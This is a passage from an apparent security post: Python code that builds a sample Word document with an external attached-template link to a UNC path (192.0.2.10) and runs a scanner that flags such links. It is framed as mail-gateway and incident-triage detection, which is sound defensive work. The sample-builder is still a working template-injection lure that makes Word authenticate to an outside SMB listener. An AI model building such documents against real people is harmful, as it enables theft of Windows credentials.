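    (assumption: the relationship Word resolves when the document enters editing mode)."""
    settings_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}attachedTemplate" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    root_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", root_rels)
        z.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        z.writestr("word/settings.xml",
                   f'<w:settings xmlns:w="{w_ns}" xmlns:r="{r_ns}"><w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx("\\\\192.0.2.10\\share\\template.dotx")
    for finding in scan_docx(doc):
        print(finding)
```

Run scan_docx over attachments at the mail gateway or during incident triage; a hit names the relationship type and the host the document will authenticate to, which is exactly the SMBProxy-style listener the capture module is waiting on.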
© 2024 Packet Storm. All rights reserved.
